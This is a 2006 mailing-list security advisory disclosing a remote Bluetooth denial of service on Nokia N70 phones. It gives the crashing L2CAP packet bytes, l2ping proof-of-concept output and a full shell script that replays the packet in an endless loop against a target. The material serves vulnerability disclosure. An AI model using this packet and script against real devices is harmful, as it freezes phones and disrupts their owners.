[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <43F2EE0B.2050704@infratech.fr>
Date: Wed Feb 15 09:02:15 2006
From: research at infratech.fr (Infratech Research)
Subject: [ Secuobs - Advisory ] Another kind of DoS on
Nokia cell phones
[Software affected] Bluetooth Stack on Nokia cell phones
[Version] Nokia N70 and maybe other models
[Impact] Remote Denial of Service, cellular phones begin to be slower and then freeze after a short period (within 30 seconds).
[Credits] Pierre Betouin - pierre.betouin@...ratech.fr - Bug found with BSS new release v0.8 GPL fuzzer (Bluetooh Stack Smasher - Linux)
BSS could be downloaded on http://www.secuobs.com/news/15022006-bss_0_8.shtml
[Vendor] notified now
[Original advisory]
http://www.secuobs.com/news/15022006-nokia_n70.shtml#english
http://www.secuobs.com/news/15022006-nokia_n70.shtml#french
[Concept]
L2CAP packets responsible of the crash are :
7D AF 00 00 41 41 41
Where:
Code field 0x7D (1 byte)
Ident field 0xAF (1 byte)
Length field 0x0000 (2 bytes)
0x41 bytes are random padding.
[Proof of Concept]
# l2ping -c 3 00:15:A0:XX:XX:XX
Ping: 00:15:A0:XX:XX:XX from 00:20:E0:75:83:DA (data size 44) ...
0 bytes from 00:15:A0:XX:XX:XX id 0 time 64.18ms
0 bytes from 00:15:A0:XX:XX:XX id 1 time 43.94ms
0 bytes from 00:15:A0:XX:XX:XX id 2 time 37.25ms
3 sent, 3 received, 0% loss
# ./loop.sh 00:15:A0:XX:XX:XX
(.. snip ..)
# l2ping -c 1 00:15:A0:XX:XX:XX
Ping: 00:15:A0:XX:XX:XX from 00:20:E0:75:83:DA (data size 248) ...
no response from 00:15:A0:XX:XX:XX id 0
1 sent, 0 received, 100% loss
[replay_l2cap_packet_nokiaN70.c] could be downloaded on http://www.secuobs.com/replay_l2cap_packet_nokiaN70.c
[Loop.sh] as follows :
#!/bin/bash
# Another Nokia N70 Bluetooth remote Denial of Service
# Pierre BETOUIN pierre.betouin@...ratech.fr
# Feb 14 11:21:58 GMT+1 2006
echo "Another Nokia N70 Bluetooth remote Denial of Service"
echo "Pierre BETOUIN pierre.betouin@...ratech.fr"
echo ""
if (( $# < 1 )); then
echo "Usage: $0 (uses replay_l2cap_packet_nokiaN70)"
exit
fi
if [ -x ./replay_l2cap_packet_nokiaN70 ]; then
echo "Kill this prog with \"killall -9 loop.sh\" in another terminal."
echo "PRESS ENTER TO LAUNCH THE DoS (or Ctrl-c to exit now)"
echo ""
read
while (( 1 )); do # Infinite loop, a bit dirty, we must say ;)
./replay_l2cap_packet_nokiaN70 $1
done
else
echo "You must compile replay_l2cap_packet_nokiaN70 before"
echo "gcc -lbluetooth -o replay_l2cap_packet_nokiaN70 replay_l2cap_packet_nokiaN70.c"
exit
fi
Powered by blists - more mailing lists